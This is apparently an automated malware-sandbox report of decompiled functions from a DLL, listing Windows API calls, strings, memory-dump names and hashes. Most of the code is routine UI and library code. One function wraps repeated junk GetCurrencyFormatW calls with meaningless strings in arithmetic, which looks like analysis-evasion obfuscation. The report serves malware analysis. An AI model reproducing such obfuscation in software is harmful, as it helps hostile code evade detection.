0x10008089
0x10008094
0x10008097
0x1000809c
0x100080a5
0x100080a5
0x100080ad
0x100080af
0x100080af
0x100080af
0x00000000
0x100080af
0x10007fb4
0x10007fb8
0x10007fc3
0x10007fc7
0x10007fd7
0x10007fda
0x10007fde
0x10007fe3
0x10007fe6
0x10007ff1
0x10007ff1
0x00000000
0x10007fe6
0x10007f7c
0x10007f7e
0x00000000
0x00000000
0x10007f88
0x10007f8a
0x00000000
0x00000000
0x10007f94
0x10007f9b
0x10007fa0
0x10007fa2
0x10007fa4
0x00000000
0x00000000
0x10007fa6
0x10007fab
0x10007fad
0x10007fad
0x00000000
0x10007fab
0x10007f18
0x10007f23
0x10007f3a
0x00000000
0x10007f3a
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 10007ED1
GetSystemMetrics.USER32 ref: 10007F82
GlobalLock.KERNEL32 ref: 10007FEB
CreateDialogIndirectParamA.USER32(?,?,?,Function_00007926,00000000), ref: 1000801A

Strings

MS Shell Dlg, xrefs: 10007F8C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
Instruction ID: 1ea4d1b8922e6c5543e762249093f9d57ee88d3b172a0da63e9484b16312698d
Opcode Fuzzy Hash: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
Instruction Fuzzy Hash: AF51DD30D0020A9FEB11DBA4CC859EEBBB0FF44380F214568F545EB19ADB349E85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001534 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001534(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _t22;
				signed int _t45;
				void* _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr* _t64;
				void* _t73;

				_t51 = __ecx;
				_t45 = _a16 * _a20;
				_t22 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t55 = _a4;
				_a16 = E100014F4(_t51) + _t22 * (_t45 - _a12 + _t55 + _a8) *  *0x100440d4 * 0x34;
				_a12 = _t55 - _t45 - _a12 + _a8;
				_t73 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440cc * 0x24 +  *((intOrPtr*)(_a16 + 0xc));
				_t50 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440e0 +  *((intOrPtr*)(_t73 + 0xc));
				_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440d4 * 0x48 +  *((intOrPtr*)(_t73 + 0xc));
				while(E10001395( *((intOrPtr*)(_t64 + 0x30)) + GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 2, _a24) != 0) {
					_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 0x48 +  *_t64;
					if(_t64 != _t50) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t64 + 0x18));
			}

0x10001534
0x10001539
0x1000155f
0x10001561
0x10001598
0x100015a9
0x100015cc
0x100015ef
0x10001619
0x1000161c
0x10001676
0x1000167a
0x00000000
0x00000000
0x00000000
0x1000167c
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 1000155F

Part of subcall function 100014F4: GetCurrencyFormatW.KERNEL32 ref: 10001512

GetCurrencyFormatW.KERNEL32 ref: 100015B5
GetCurrencyFormatW.KERNEL32 ref: 100015DF
GetCurrencyFormatW.KERNEL32 ref: 10001606
GetCurrencyFormatW.KERNEL32 ref: 10001639
GetCurrencyFormatW.KERNEL32 ref: 10001668

Strings

xadqsavcbdfewescGADW, xrefs: 1000153E, 1000154C, 10001593, 100015D0, 100015F7, 1000162A, 10001659
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001534, 10001553, 100015A4, 100015D7, 100015FE, 10001631, 10001660

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
Instruction ID: 4961d4481171c5eb7b22e17488040c19a8d80f5034832b3bd1fa6cad81c8b5c3
Opcode Fuzzy Hash: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
Instruction Fuzzy Hash: 52319D73644215BFE204CB55CD82F86FBA9EB9A751F06401AF704BF5D1CB30A8548EA8

Uniqueness

Uniqueness Score: -1.00%

Function 10004C30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10004C30(void* __edx, void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t38;
				void* _t43;
				void* _t51;
				void* _t52;
				void* _t53;
				long* _t54;
				void* _t58;
				CHAR* _t63;
				signed int _t64;
				void* _t66;

				_t66 = __eflags;
				_t51 = __edx;
				_push(0xffffffff);
				_push(E10032E77);
				_push( *[fs:0x0]);
				_push(_t43);
				_push(_t38);
				_push(_t52);
				_t19 =  *0x10045580; // 0xe155dca3
				_push(_t19 ^ _t64);
				 *[fs:0x0] = _t64 + 0x18;
				_t58 = _t43;
				E10007D6C(_t38, _t43, _t52);
				_push(GetSystemMenu( *(_t58 + 0x20), 0));
				_t53 = E1000ED5E(0, _t43, _t52, _t58, _t66);
				if(_t53 != 0) {
					E1000424F(_t64 + 0x18, E1001044F());
					 *((intOrPtr*)(_t64 + 0x24)) = 0;
					E10004C10(_t64 + 0x18, 0x65);
					_t63 =  *(_t64 + 0x14);
					if( *((intOrPtr*)(_t63 - 0xc)) != 0) {
						AppendMenuA( *(_t53 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t53 + 4), 0, 0x10, _t63);
					}
					 *(_t64 + 0x20) =  *(_t64 + 0x20) | 0xffffffff;
					E10001260(_t63 - 0x10, _t51);
				}
				_t54 = _t58 + 0x11c;
				SendMessageA( *(_t58 + 0x20), 0x80, 1,  *_t54);
				SendMessageA( *(_t58 + 0x20), 0x80, 0,  *_t54);
				E1000EE6D(_t58, 0x3e9, "Hola Mundo");
				E1000EE6D(_t58, 0x3ea, "Hola Mundo");
				SendMessageA( *(_t58 + 0xe8), 0x143, 0, "Hola");
				 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x18));
				return 1;
			}

0x10004c30
0x10004c30
0x10004c30
0x10004c32
0x10004c3d
0x10004c3e
0x10004c3f
0x10004c42
0x10004c43
0x10004c4a
0x10004c4f
0x10004c55
0x10004c57
0x10004c68
0x10004c6e
0x10004c72
0x10004c7e
0x10004c89
0x10004c8d
0x10004c92
0x10004c99
0x10004cab
0x10004cb5
0x10004cb5
0x10004cb7
0x10004cbf
0x10004cbf
0x10004cca
0x10004cdd
0x10004ce7
0x10004cf6
0x10004d03
0x10004d1a
0x10004d23
0x10004d32

APIs

GetSystemMenu.USER32(?,00000000,E155DCA3,?,?,?,?,?,?,10032E77,000000FF), ref: 10004C62
AppendMenuA.USER32 ref: 10004CAB
AppendMenuA.USER32 ref: 10004CB5
SendMessageA.USER32 ref: 10004CDD
SendMessageA.USER32 ref: 10004CE7
SendMessageA.USER32 ref: 10004D1A

Strings

Hola, xrefs: 10004D08
Hola Mundo, xrefs: 10004CE9, 10004CEE, 10004CFB

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: MenuMessageSend$Append$System
String ID: Hola$Hola Mundo
API String ID: 1041970973-3638179569
Opcode ID: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
Instruction ID: b3705290631e1be327c95a3509f9ae24e9e58cb89a542e4eda3f4c22a02a2666
Opcode Fuzzy Hash: e34ef31d9de0c10b9e087c5bcc9f0d31551c493d279669179a5a011054600792
Instruction Fuzzy Hash: 4521E571600744BFE711DB20CC82F6BB7A9FB49B90F004A29F255A61E1DB36BD04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10012309 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10012309(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10045580; // 0xe155dca3
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1001FBB5(E100121BA(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x1001230f
0x10012316
0x1001231b
0x10012324
0x10012327
0x1001232a
0x1001232f
0x10012333
0x1001233d
0x1001234c
0x10012350
0x1001235d
0x1001235f
0x10012361
0x10012361
0x1001237c
0x1001237f
0x1001237f
0x10012385
0x10012385
0x1001238b
0x1001238d
0x1001238d
0x100123a8
0x100123a8
0x10012337
0x1001233b
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 1001232F
GetStockObject.GDI32(0000000D), ref: 10012337
GetObjectA.GDI32(00000000,0000003C,?), ref: 10012344
GetDC.USER32(00000000), ref: 10012353
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10012367
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10012373
ReleaseDC.USER32 ref: 1001237F

Strings

System, xrefs: 1001232A, 10012394

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
Instruction ID: 49ddb338abe5c97598327bd9655a3bb67b407c313b2becf61478e8986669c503
Opcode Fuzzy Hash: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
Instruction Fuzzy Hash: 9B1182B1600328AFEB14DBA0CC89FAE77B8EB49781F014015F601EE1D1DB749E418B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001D204 Relevance: 13.8, APIs: 9, Instructions: 253
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E1001D204(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E1001FC63(E100348FF, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E1000EC55(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_push( *(_t191 + 8) << 4);
					_t127 = E100010EE(_t173, _t185, _t187, _t191, __eflags);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E100203C0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E10020F40(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E1001C9FD(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_push(_t49);
						_t135 = E100010EE(_t173, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E1001FCBF(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E1000E519();
							goto L7;
						}
						E100203C0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x10038ec0;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E1001CF1C(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E1001CDAE(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E1001CE04(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E1000E519();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1001D514))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E1001CE04(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E1000E519();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E1001E78B();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E1001E78B();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E1001E78B();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E1001E78B();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(E100010EE(_t173, _t185, _t19, _t190, _t201) != 0) {
					E100203C0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E10005007(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

0x1001d204
0x1001d204
0x1001d204
0x1001d20b
0x1001d210
0x1001d219
0x1001d21e
0x1001d221
0x1001d224
0x1001d228
0x1001d22b
0x1001d22f
0x1001d232
0x1001d237
0x1001d237
0x1001d23d
0x1001d243
0x1001d247
0x1001d24c
0x1001d253
0x1001d256
0x1001d2ca
0x1001d2ca
0x1001d2d3
0x1001d2d4
0x1001d2d9
0x1001d2db
0x1001d2dc
0x1001d2ed
0x1001d2f0
0x1001d2f6
0x00000000
0x00000000
0x1001d2f8
0x1001d2fd
0x1001d302
0x1001d305
0x1001d30d
0x1001d312
0x1001d320
0x1001d322
0x1001d322
0x1001d325
0x1001d326
0x1001d32b
0x1001d32e
0x1001d266
0x1001d266
0x1001d26e
0x1001d27a
0x1001d507
0x1001d50f
0x1001d50f
0x1001d270
0x1001d273
0x1001d275
0x1001d275
0x00000000
0x1001d275
0x1001d336
0x1001d33b
0x1001d33e
0x1001d340
0x1001d342
0x1001d349
0x1001d34c
0x1001d34f
0x1001d352
0x1001d35b
0x1001d35c
0x1001d362
0x1001d365
0x1001d369
0x1001d36c
0x1001d36f
0x1001d370
0x1001d373
0x1001d374
0x1001d379
0x1001d37b
0x1001d37e
0x1001d3d9
0x1001d3d9
0x1001d3dc
0x1001d3de
0x1001d3e1
0x1001d3fc
0x1001d3fc
0x1001d400
0x1001d403
0x1001d450
0x1001d455
0x1001d458
0x1001d45a
0x1001d4b6
0x1001d4b6
0x1001d4b9
0x1001d4df
0x1001d4e5
0x1001d4e8
0x1001d4ec
0x1001d4f1
0x1001d4f5
0x1001d4f9
0x1001d4fb
0x1001d4fe
0x1001d500
0x1001d500
0x1001d505
0x00000000
0x1001d505
0x1001d4bb
0x1001d4bb
0x1001d4bc
0x1001d4c6
0x1001d4c6
0x1001d4c8
0x1001d4cd
0x1001d4cd
0x00000000
0x1001d4c8
0x1001d4be
0x1001d4be
0x1001d4c1
0x1001d4d6
0x00000000
0x1001d4d6
0x1001d4c3
0x1001d4c4
0x00000000
0x00000000
0x00000000
0x1001d4c4
0x1001d45c
0x1001d45f
0x1001d465
0x1001d468
0x1001d46b
0x00000000
0x00000000
0x1001d46d
0x00000000
0x1001d49c
0x1001d49c
0x00000000
0x00000000
0x1001d4ad
0x00000000
0x00000000
0x1001d48a
0x00000000
0x00000000
0x1001d492
0x00000000
0x00000000
0x1001d479
0x1001d47c
0x1001d47f
0x1001d482
0x00000000
0x00000000
0x1001d497
0x1001d49a
0x00000000
0x00000000
0x1001d4a2
0x1001d4a5
0x1001d4a7
0x1001d4a8
0x1001d4a9
0x1001d4aa
0x00000000
0x00000000
0x00000000
0x00000000
0x1001d474
0x00000000
0x00000000
0x1001d46d
0x1001d405
0x1001d409
0x1001d40e
0x1001d412
0x1001d416
0x1001d418
0x1001d41b
0x1001d41d
0x1001d41d
0x00000000
0x1001d422
0x1001d3e9
0x1001d3ec
0x1001d3f2
0x1001d3f6
0x1001d3f7
0x1001d3f7
0x00000000
0x1001d3e9
0x1001d380
0x1001d384
0x1001d387
0x1001d388
0x1001d389
0x1001d38c
0x1001d390
0x1001d3c4
0x1001d3c9
0x1001d3cf
0x1001d3d2
0x1001d3d2
0x00000000
0x1001d3d2
0x1001d392
0x1001d395
0x1001d3ba
0x1001d3ba
0x1001d3bf
0x00000000
0x1001d3bf
0x1001d397
0x1001d39a
0x00000000
0x00000000
0x1001d39f
0x1001d3a2
0x1001d3b6
0x1001d3a4
0x1001d3a9
0x1001d3ac
0x1001d3ac
0x00000000
0x1001d3a2
0x1001d2de
0x1001d2de
0x1001d2e2
0x1001d2e5
0x00000000
0x00000000
0x1001d2e7
0x1001d2ea
0x00000000
0x1001d2ea
0x1001d258
0x1001d258
0x1001d25b
0x1001d264
0x1001d286
0x1001d28b
0x1001d28e
0x1001d294
0x1001d299
0x1001d29e
0x1001d2a2
0x1001d2a5
0x1001d2a9
0x1001d2ac
0x1001d2b0
0x1001d2b0
0x1001d2b1
0x1001d2b5
0x1001d2b9
0x1001d2ba
0x1001d2bd
0x1001d2c5
0x1001d2c8
0x1001d2c8
0x00000000
0x1001d2c8
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1001D20B
lstrlenA.KERNEL32(00000000,000000FF,00000050,10012995,00000000,00000001,?,?,000000FF,?,?,?), ref: 1001D23D
__alloca_probe_16.LIBCMT ref: 1001D286

Part of subcall function 10005007: _memcpy_s.LIBCMT ref: 10005017

__alloca_probe_16.LIBCMT ref: 1001D2FD
_memset.LIBCMT ref: 1001D30D
__alloca_probe_16.LIBCMT ref: 1001D336
VariantClear.OLEAUT32(?), ref: 1001D3EC

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

